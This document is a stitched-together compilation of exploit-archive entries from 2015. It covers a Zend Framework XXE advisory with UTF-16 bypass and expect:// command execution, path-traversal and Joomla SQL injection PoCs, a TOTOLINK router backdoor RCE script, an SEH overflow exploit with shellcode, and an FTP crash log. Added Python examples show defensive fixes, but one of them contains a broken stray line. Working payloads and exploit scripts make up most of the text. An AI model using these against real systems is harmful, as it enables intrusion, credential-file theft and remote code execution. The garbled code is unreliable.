<int>631</int></value></member><member><name>faultString</name><value>
<string>Failed to parse request</string></value></member></struct></value>
</fault></methodResponse>

which is due to the heuristicScan ENTITY detection. We can now encode the data to avoid the check.
$ cat poc-utf8.xml | sed 's/UTF-8/UTF-16/' \
  | iconv -f UTF-8 -t UTF-16 >poc-utf16.xml

The hex representation of the UTF-16 encoded XML file (including the change in the XML header to reflect the new encoding) looks as follows:

$ hexdump -C poc-utf16.xml
00000000  ff fe 3c 00 3f 00 78 00  6d 00 6c 00 20 00 76 00  |..<.?.x.m.l. .v.|
00000010  65 00 72 00 73 00 69 00  6f 00 6e 00 3d 00 22 00  |e.r.s.i.o.n.=.".|
00000020  31 00 2e 00 30 00 22 00  20 00 65 00 6e 00 63 00  |1...0.". .e.n.c.|
00000030  6f 00 64 00 69 00 6e 00  67 00 3d 00 22 00 55 00  |o.d.i.n.g.=.".U.|
00000040  54 00 46 00 2d 00 38 00  22 00 3f 00 3e 00 0a 00  |T.F.-.8.".?.>...|
00000050  3c 00 21 00 44 00 4f 00  43 00 54 00 59 00 50 00  |<.!.D.O.C.T.Y.P.|
00000060  45 00 20 00 6d 00 65 00  74 00 68 00 6f 00 64 00  |E. .m.e.t.h.o.d.|
00000070  43 00 61 00 6c 00 6c 00  20 00 5b 00 0a 00 20 00  |C.a.l.l. .[... .|
00000080  20 00 3c 00 21 00 45 00  4e 00 54 00 49 00 54 00  | .<.!.E.N.T.I.T.|
00000090  59 00 20 00 70 00 6f 00  63 00 64 00 61 00 74 00  |Y. .p.o.c.d.a.t.|
000000a0  61 00 20 00 53 00 59 00  53 00 54 00 45 00 4d 00  |a. .S.Y.S.T.E.M.|
000000b0  20 00 22 00 66 00 69 00  6c 00 65 00 3a 00 2f 00  | .".f.i.l.e.:./.|
000000c0  2f 00 2f 00 65 00 74 00  63 00 2f 00 70 00 61 00  |/./.e.t.c./.p.a.|
000000d0  73 00 73 00 77 00 64 00  22 00 3e 00 0a 00 5d 00  |s.s.w.d.".>...].|
000000e0  3e 00 0a 00 3c 00 6d 00  65 00 74 00 68 00 6f 00  |>...<.m.e.t.h.o.|
000000f0  64 00 43 00 61 00 6c 00  6c 00 3e 00 0a 00 20 00  |d.C.a.l.l.>... .|
00000100  20 00 3c 00 6d 00 65 00  74 00 68 00 6f 00 64 00  | .<.m.e.t.h.o.d.|
00000110  4e 00 61 00 6d 00 65 00  3e 00 72 00 65 00 74 00  |N.a.m.e.>.r.e.t.|
00000120  72 00 69 00 65 00 76 00  65 00 64 00 3a 00 20 00  |r.i.e.v.e.d.:. .|
00000130  26 00 70 00 6f 00 63 00  64 00 61 00 74 00 61 00  |&.p.o.c.d.a.t.a.|
00000140  3b 00 3c 00 2f 00 6d 00  65 00 74 00 68 00 6f 00  |;.<./.m.e.t.h.o.|
00000150  64 00 4e 00 61 00 6d 00  65 00 3e 00 0a 00 3c 00  |d.N.a.m.e.>...<.|
00000160  2f 00 6d 00 65 00 74 00  68 00 6f 00 64 00 43 00  |/.m.e.t.h.o.d.C.|
00000170  61 00 6c 00 6c 00 3e 00  0a 00                    |a.l.l.>...|

As can be seen in the hexdump, the ENTITY word is encoded using 2-byte characters.

Resupplying the encoded data contained in poc-utf16.xml to the Zend XMLRPC application may, depending on the underlying libxml library, result in password file retrieval from the remote server:

$ wget -q -O /dev/stdout http://apache-phpfpm/zend_poc/zend-xmlrpc-server.php \
  --post-file=poc-utf16.xml

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value>
<int>620</int></value></member><member><name>faultString</name><value><string>
Method "retrieved: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[cut]
" does not exist</string></value></member></struct></value></fault>
</methodResponse>

If the password file is not returned, an attacker may try another variant of the XXE attack using parameter entities and out-of-band communication. Both of these can be used to exploit the vulnerability in Zend Framework on a greater number of libxml configurations.

Remote command execution may also be possible if the remote system has an 'expect' PHP module (libexpect-php) installed. If this is the case, we can for example execute the 'id' command by injecting the entity:

<!ENTITY pocdata SYSTEM "expect://id">

which should return a result similar to:

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value>
<int>620</int></value></member><member><name>faultString</name><value>
<string>Method "retrieved: uid=33(www-data) gid=33(www-data) groups=33(www-data)
" does not exist</string></value></member>

A separate POC exploit (zend-xmlrpc-exploit-cmd-exec.sh) is included which runs commands with parameters and also implements parameter entities/OOB communication.

As mentioned in the description of this vulnerability, the Zend Framework adds the LIBXML_NONET flag to the loadXML() call in order to prevent reaching network resources through XXE. As a result, requesting a network resource such as http://192.168.57.10 via XXE injection will fail. This can be bypassed by using the php://filter wrapper inside an entity, e.g.:

<!ENTITY pocdata SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.57.10">

This will return a base64 encoded response from the remote server, bypassing the LIBXML_NONET restriction:

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int>
</value></member><member><name>faultString</name><value><string>Method "
retrieved: PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hb
C8vRU4iPgo8aHRtbD4KIDxoZWFkPgogIDx0aXRsZT5JbmRleCBvZiAvPC90aXRsZT4KIDwvaGVhZ
D4KIDxib2R5Pgo8aDE+SW5kZXggb2YgLzwvaDE+CiAgPHRhYmxlPgogICA8dHI+PHRoIHZhbGlnb
j0idG9wIj48aW1nIHNyYz0iL2ljb[cut]

This vulnerability may also lead to Denial of Service if, for example, the attacker requests the /dev/random file through XXE. This will cause the application to block on the endless input from the random generator pseudo-device until the maximum execution time is reached.
Sending multiple requests of this kind would exhaust the maximum number of threads that the web server can create.

VI. BUSINESS IMPACT
-------------------------

Unauthenticated remote exploitation may be possible on applications which make use of Zend_XmlRpc_Server with a public XML-RPC endpoint, as demonstrated in this advisory. Authentication in the case of XML-RPC is not required for exploitation, as the XML needs to be processed first in order for the application to read the credentials passed as login data within the XML-formatted input.

This issue should be marked as high/critical due to the wide deployment of Zend Framework (which includes some major CMS and e-commerce applications), the number of Zend XML classes affected, the low complexity of exploitation, as well as the possibility of unauthenticated remote exploitation. There is also a growing number of servers set up to serve PHP code with PHP-FPM, especially in web hosting environments which need to respond to heavy load.

VII. SYSTEMS AFFECTED
-------------------------

All systems making use of Zend Framework in versions starting from 1.12.4 and 2.1.6 up to the latest versions of Zend Framework 1.12.13 (released 2015-05-20) and 2.4.2 (released 2015-05-11) contain the XXE injection vulnerability described in this advisory.

All Zend Framework classes making use of XML and calling the vulnerable Zend_Xml_Security::scan() function are affected by this issue:

Zend/Amf/Parse/Amf0/Deserializer.php
Zend/Amf/Parse/Amf3/Deserializer.php
Zend/Config/Xml.php
Zend/Dom/Query.php
Zend/Feed/Abstract.php
Zend/Feed/Entry/Abstract.php
Zend/Feed/Entry/Atom.php
Zend/Feed.php
Zend/Feed/Reader.php
Zend/Feed/Writer/Renderer/Entry/Atom.php
Zend/Gdata/App/Base.php
Zend/Gdata/App.php
Zend/Gdata/Gapps/ServiceException.php
Zend/Gdata/YouTube.php
Zend/Json.php
Zend/Mobile/Push/Message/Mpns/Raw.php
Zend/Rest/Client/Result.php
Zend/Search/Lucene/Document/Docx.php
Zend/Search/Lucene/Document/OpenXml.php
Zend/Search/Lucene/Document/Pptx.php
Zend/Search/Lucene/Document/Xlsx.php
Zend/Serializer/Adapter/Wddx.php
Zend/Service/Amazon/Ec2/Response.php
Zend/Service/Amazon.php
Zend/Service/Amazon/SimpleDb/Response.php
Zend/Service/Audioscrobbler.php
Zend/Service/Delicious.php
Zend/Service/Ebay/Finding.php
Zend/Service/Flickr.php
Zend/Service/SlideShare.php
Zend/Service/SqlAzure/Management/Client.php
Zend/Service/Technorati.php
Zend/Service/WindowsAzure/Diagnostics/ConfigurationInstance.php
Zend/Service/WindowsAzure/Management/Client.php
Zend/Service/WindowsAzure/Storage.php
Zend/Service/Yahoo.php
Zend/Soap/Server.php
Zend/Soap/Wsdl.php
Zend/XmlRpc/Request.php
Zend/XmlRpc/Response.php

The vulnerability can be exploited in applications using a vulnerable version of the framework, where PHP code is served with PHP-FPM, and when the XML parser installed on the system is set up to resolve entities.

PHP-FPM can be set up on popular web servers such as Apache or Nginx on Linux/Unix, as well as on Windows systems (as per the 'fpm on cygwin' setup guides available on the Internet).

VIII. SOLUTION
-------------------------

Install the latest version of Zend Framework containing the patch for this vulnerability.

IX. REFERENCES
-------------------------

http://legalhackers.com/
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
http://framework.zend.com/blog/zend-framework-2-5-0-released.html
http://framework.zend.com/security/advisory/ZF2015-06
http://www.securiteam.com/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5161

X. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XI. REVISION HISTORY
-------------------------

Aug 12th, 2015: Final version

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
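The encoding bypass described in section IV of the advisory above, as an added example that is not Zend's code (it is written in Python so it runs without PHP or the framework): naive_heuristic_scan() reproduces heuristicScan()'s byte-string check, detect_encoding() picks the charset the way an XML parser does (byte-order mark first, then the XML declaration, then the UTF-8 default), and decoding_scan() applies the check only after decoding and rejects any DOCTYPE, which is the stricter behaviour appropriate for an XML-RPC endpoint that never expects a DTD. POC_UTF8, POC_UTF16 and BENIGN are constructed inputs shaped like the advisory's PoC.

```python
import codecs
import re
from typing import Optional

# Constructed sample input: the advisory's XML-RPC call carrying an external
# entity, once as UTF-8 and once re-encoded as UTF-16 LE with a byte-order
# mark, which is what `iconv -t UTF-16` produces on a little-endian host.
POC_UTF8 = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE methodCall [\n'
    b'  <!ENTITY pocdata SYSTEM "file:///etc/passwd">\n'
    b']>\n'
    b'<methodCall>\n'
    b'  <methodName>retrieved: &pocdata;</methodName>\n'
    b'</methodCall>\n'
)
POC_UTF16 = codecs.BOM_UTF16_LE + POC_UTF8.decode("utf-8").encode("utf-16-le")
BENIGN = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<methodCall><methodName>helloworld</methodName></methodCall>'
)


def naive_heuristic_scan(xml: bytes) -> bool:
    """Same logic as Zend's heuristicScan(): True only when the literal
    byte sequence '<!ENTITY' occurs in the undecoded request body."""
    return b"<!ENTITY" in xml


def detect_encoding(xml: bytes) -> str:
    """Choose the encoding the way a parser does: BOM, then the encoding
    pseudo-attribute of the XML declaration, then the UTF-8 default."""
    if xml.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"
    if xml.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return "utf-16"  # the 'utf-16' codec reads and strips the BOM itself
    # UTF-16 without a BOM: the '<' of the declaration sits next to a NUL byte
    if xml[:2] == b"<\x00":
        return "utf-16-le"
    if xml[:2] == b"\x00<":
        return "utf-16-be"
    m = re.match(rb'<\?xml[^>]*?encoding=["\']([A-Za-z0-9._-]+)["\']', xml)
    return m.group(1).decode("ascii") if m else "utf-8"


def decoding_scan(xml: bytes) -> Optional[str]:
    """Decode first, inspect second. Returns None for input that carries no
    DTD markup, otherwise the reason to reject it: 'DOCTYPE', 'ENTITY', or
    'UNDECODABLE' when the bytes cannot be decoded in the declared encoding."""
    try:
        text = xml.decode(detect_encoding(xml))
    except (LookupError, UnicodeDecodeError):
        return "UNDECODABLE"
    m = re.search(r"<!(DOCTYPE|ENTITY)\b", text)
    return m.group(1) if m else None


if __name__ == "__main__":
    for name, doc in (("utf-8", POC_UTF8), ("utf-16", POC_UTF16), ("benign", BENIGN)):
        print(name, "byte check:", naive_heuristic_scan(doc),
              "decoded check:", decoding_scan(doc))
```

Run stand-alone, the script shows the gap the advisory describes: the UTF-16 document passes the byte-level check and is caught by the decoding one. The same principle applies on the PHP side: whatever string check is used must run on text normalised to a single encoding, and an endpoint that has no business accepting a DTD is safer rejecting any DOCTYPE than matching on the spelling of ENTITY.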

Gkplugins Picasaweb - Download File

# Exploit Title: Gkplugins Picasaweb Download File
# Date : 2015-08-13
# Exploit Author : TMT [VNhgroup]
# Vendor Homepage: https://gkplugins.com/
# Tested on: Windows 7

File
------------------------
$fileout = $_GET['f'];   <-- user-supplied path, passed unchecked to readfile() below
$filelength = $_GET['l'];
$filestream = $_GET['start'];
if($fileout!=""){
    $fileout = urldecode($fileout);
    $filelength = urldecode($filelength);
    if($filestream!=""){
        $filelength -= $filestream;
        $filestream = "?start=".$filestream;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . $filelength);
    readfile($fileout.$filestream);
}else{
    $text = get_curl($link);
    echo $text;
}
------------------------------

Exploit Code:

site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php
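The defect above is that the `f` parameter is urldecoded and handed straight to readfile(), so `../` sequences (and, since readfile() accepts stream wrappers, URLs) are honoured. As an added example, not the plugin's code and written in Python rather than PHP, resolve_download() shows the check such a download handler needs: resolve the requested name against a fixed base directory, and serve it only if the resolved real path is still inside that directory. demo() builds a throwaway directory tree with constructed files so the function can be exercised offline.

```python
import os
import tempfile
from typing import Optional


def resolve_download(base_dir: str, requested: str) -> Optional[str]:
    """Map a user-supplied (already URL-decoded) file name onto a path
    inside base_dir.

    Returns the absolute path to serve, or None when the request is empty,
    an absolute path, a URL (a PHP readfile() would open those through its
    stream wrappers), or a relative name that ends up outside base_dir once
    '..' components and symlinks have been resolved.
    """
    if not requested or os.path.isabs(requested) or "://" in requested:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath() compares whole path components, so a sibling such as
    # 'downloads2' does not pass as being under 'downloads'
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo() -> dict:
    """Create a download root holding one file and a file outside it, then try
    a legitimate name and the traversal/URL forms a download handler sees."""
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "downloads")
    os.mkdir(downloads)
    with open(os.path.join(downloads, "video.mp4"), "wb") as f:
        f.write(b"constructed sample content")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php // constructed file that must not be downloadable ?>")
    return {
        "legit": resolve_download(downloads, "video.mp4"),
        "expected_legit": os.path.realpath(os.path.join(downloads, "video.mp4")),
        "traversal": resolve_download(downloads, "../index.php"),
        "deep_traversal": resolve_download(downloads, "../../../index.php"),
        "absolute": resolve_download(downloads, "/etc/passwd"),
        "url": resolve_download(downloads, "http://example.invalid/x.mp4"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>15}: {result}")
```

The decisive step is comparing the resolved real path, not the raw string: a check that only rejects the substring `..` is defeated by encoded or symlinked variants, while realpath() plus a component-wise prefix test is not.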

TOTOLINK Routers - Backdoor / Remote Code Execution

# Exploit Title: TOTOLINK backdoor and RCE exploit POC
# Google Dork: N/A
# Date: Thu Aug 13 07:33:29 MDT 2015
# Exploit Author: MadMouse
# Vendor Homepage: http://www.totolink.net/
# Software Link: http://www.totolink.net/include/download.asp?path=down/010100&file=TOTOLINK%20A850R-V1_1.0.1_20150725.zip
# Version: A850R-V1 : until last firmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web,
#          F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web,
#          F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web,
#          N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web,
#          N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web,
#          N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web,
#          N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web,
#          N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
# Tested on: A850R-V1
# CVE : N/A
# Credit: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt

#!/usr/bin/env python
# ------------------------------------------------------------------------------
# THE SCOTCH-WARE LICENSE (Revision 43):
# <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a shot of scotch in return
# ------------------------------------------------------------------------------

import socket, sys
import urllib  # Python 2 module; provides the quote_plus() used below

if len(sys.argv) < 2:
    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
    exit(1)

commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))

def check_activate_backdoor():
    try:
        vulnerable = "hel,xasf"  # this is both the check, and the command to open the management interface to the internet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send(vulnerable)
        ret = True if s.recv(len(vulnerable)) == vulnerable else False
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return ret

def close_backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send("oki,xasf")
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return

if check_activate_backdoor():
    print("\x1b[032mThis device appears to be vulnerable\nbackdoor activated\x1b[0m")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.send("POST /boafrm/formSysCmd HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)
        print("\x1b[032mCommands sent\x1b[0m")
        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    close_backdoor()
    exit(0)
else:
    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
    exit(1)

Microsoft HTML Help Compiler 4.74.8702.0 - Local Overflow (SEH)

#!/usr/bin/env python
#
# Exploit Title: Microsoft HTML Help Compiler SEH Based Overflow
# Date: 2015-08-13
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&displaylang=en
# Version: 4.74.8702.0
# Tested on: Windows 7
#

from subprocess import Popen
from struct import pack

# 112 bytes All Windows Null-Free CreateProcessA Calc Shellcode
# We have only 189 bytes after SE Handler
# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
shellcode=""
shellcode+="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode+="\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode+="\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode+="\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode+="\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode+="\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode+="\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode+="\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode+="\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode+="\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode+="\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode+="\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode+="\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode+="\x53\x53\x53\x53\x52\x53\xff\xd7"

junk='\x61'*284
nseh='\xeb\x1e\x90\x90'   # jump 30 bytes
nop='\x90'*40             # nop
seh=pack("<I", 0x45312d14) # pop ecx # pop ecx # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [HHA.dll]

payload=junk+nseh+seh+nop+shellcode
padding='\x61'*(10000-len(payload))
exploit=payload+padding

try:
    Popen(["C:\Program Files\HTML Help Workshop\hhc.exe",exploit],shell=False)
    print "Hack'n'Roll"
except:
    print "Cannot run hhc.exe"

Joomla! Component com_informations - SQL Injection

# Exploit Title: Joomla com_informations component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)

1. Description

A normal user can inject an SQL query through the themeid parameter in the URL, which leads to reading data from the database.

2. Proof of Concept

http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)

Injected column is # 3

http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23

** No solution yet from vendor **

#######################
# Greets to Palestine #
#######################
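Why the PoC above works and what the fix looks like, as an added example that is not the component's code: a Python/sqlite3 stand-in for the `sousthemes` query, with the request parameter spliced into the SQL string in vulnerable_lookup() and validated then bound as a parameter in safe_lookup(). The table, its rows and PAYLOAD are constructed; PAYLOAD follows the shape of the advisory's request with sqlite_version() in place of MySQL's version() and `--` in place of the `#` comment marker, since SQLite has no `#` comments.

```python
import sqlite3

# Constructed schema and rows standing in for the component's table
SCHEMA_AND_DATA = """
CREATE TABLE sousthemes (id INTEGER PRIMARY KEY, themeid INTEGER, title TEXT);
INSERT INTO sousthemes VALUES (1, 3, 'Public theme A');
INSERT INTO sousthemes VALUES (2, 3, 'Public theme B');
INSERT INTO sousthemes VALUES (3, 7, 'Other theme');
"""

# Constructed payload in the shape of the advisory's PoC request
PAYLOAD = "999.9 union select 111,222,sqlite_version()--"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA_AND_DATA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, themeid: str) -> list:
    """The request parameter becomes part of the statement text, so a value
    such as PAYLOAD turns a lookup into an attacker-chosen UNION query."""
    sql = f"SELECT id, themeid, title FROM sousthemes WHERE themeid = {themeid}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, themeid: str) -> list:
    """Validate the expected type, then bind the value as a parameter: the
    driver sends it as data, so it can never be parsed as SQL syntax."""
    if not themeid.lstrip("-").isdigit():
        raise ValueError("themeid must be an integer")
    return conn.execute(
        "SELECT id, themeid, title FROM sousthemes WHERE themeid = ?",
        (int(themeid),),
    ).fetchall()


def run_demo() -> dict:
    """Run both lookups with a normal id and with the injected value."""
    conn = make_db()
    try:
        safe_lookup(conn, PAYLOAD)
        r
        rejected = False
    except ValueError:
        rejected = True
    return {
        "normal": vulnerable_lookup(conn, "3"),
        "injected": vulnerable_lookup(conn, PAYLOAD),
        "sqlite_version": sqlite3.sqlite_version,
        "safe_normal": safe_lookup(conn, "3"),
        "safe_rejected_payload": rejected,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name:>22}: {value}")
```

With the injected value the vulnerable query returns a row `(111, 222, '<sqlite version>')` that never existed in the table, which is exactly the third-column leak the PoC relies on; the bound version either returns the real rows for a numeric id or refuses the request before any SQL is built.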

NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)

###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Ubuntu 14.04 NetKit FTP Client Crash/DoS POC
#[+] Date: 15-08-2015
#[+] Type: Local Exploits
#[+] Tested on: Ubuntu 14.04 (works with other distros; 11.04: https://www.exploit-db.com/exploits/17806/)
#[+] Twitter: @TCYB3R
##

Typing `account` with an overlong argument trips glibc's FORTIFY_SOURCE check in __strncat_chk (see the backtrace), so the client is aborted with SIGABRT: a crash and therefore a local denial of service, not a demonstrated code-execution path.

cyb3rus@ubuntu:~$ gdp ftp
No command 'gdp' found, but there are 17 similar ones
gdp: command not found
cyb3rus@ubuntu:~$ gdb ftp
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ftp...(no debugging symbols found)...done.
(gdb) run ftp-server.demo.solarwinds.com
Starting program: /usr/bin/ftp ftp-server.demo.solarwinds.com
Connected to ftp-server.demo.solarwinds.com.
220 Serv-U FTP Server v15.1 ready...
Name (ftp-server.demo.solarwinds.com:cyb3rus): demo
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7338f)[0x7ffff784238f]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff78d9c9c]
/lib/x86_64-linux-gnu/libc.so.6(+0x109b60)[0x7ffff78d8b60]
/lib/x86_64-linux-gnu/libc.so.6(__strncat_chk+0x13c)[0x7ffff78d7f9c]
/usr/bin/ftp[0x407a08]
/usr/bin/ftp[0x402cd0]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5)[0x7ffff77f0ec5]
/usr/bin/ftp[0x402f49]
======= Memory map: ========
00400000-00413000 r-xp 00000000 08:01 656161 /usr/bin/netkit-ftp
00612000-00613000 r--p 00012000 08:01 656161 /usr/bin/netkit-ftp
00613000-00615000 rw-p 00013000 08:01 656161 /usr/bin/netkit-ftp
00615000-00665000 rw-p 00000000 00:00 0 [heap]
7ffff5e4e000-7ffff5e64000 r-xp 00000000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff5e64000-7ffff6063000 ---p 00016000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff6063000-7ffff6064000 rw-p 00015000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff6064000-7ffff6746000 r--p 00000000 08:01 662545 /usr/lib/locale/locale-archive
7ffff6746000-7ffff675d000 r-xp 00000000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff675d000-7ffff695d000 ---p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695d000-7ffff695e000 r--p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695e000-7ffff695f000 rw-p 00018000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695f000-7ffff6961000 rw-p 00000000 00:00 0
7ffff6961000-7ffff6966000 r-xp 00000000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6966000-7ffff6b65000 ---p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b65000-7ffff6b66000 r--p 00004000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b66000-7ffff6b67000 rw-p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b67000-7ffff6b69000 r-xp 00000000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6b69000-7ffff6d68000 ---p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d68000-7ffff6d69000 r--p 00001000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d69000-7ffff6d6a000 rw-p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d6a000-7ffff6d75000 r-xp 00000000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6d75000-7ffff6f74000 ---p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f74000-7ffff6f75000 r--p 0000a000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f75000-7ffff6f76000 rw-p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f76000-7ffff6f8d000 r-xp 00000000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff6f8d000-7ffff718c000 ---p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
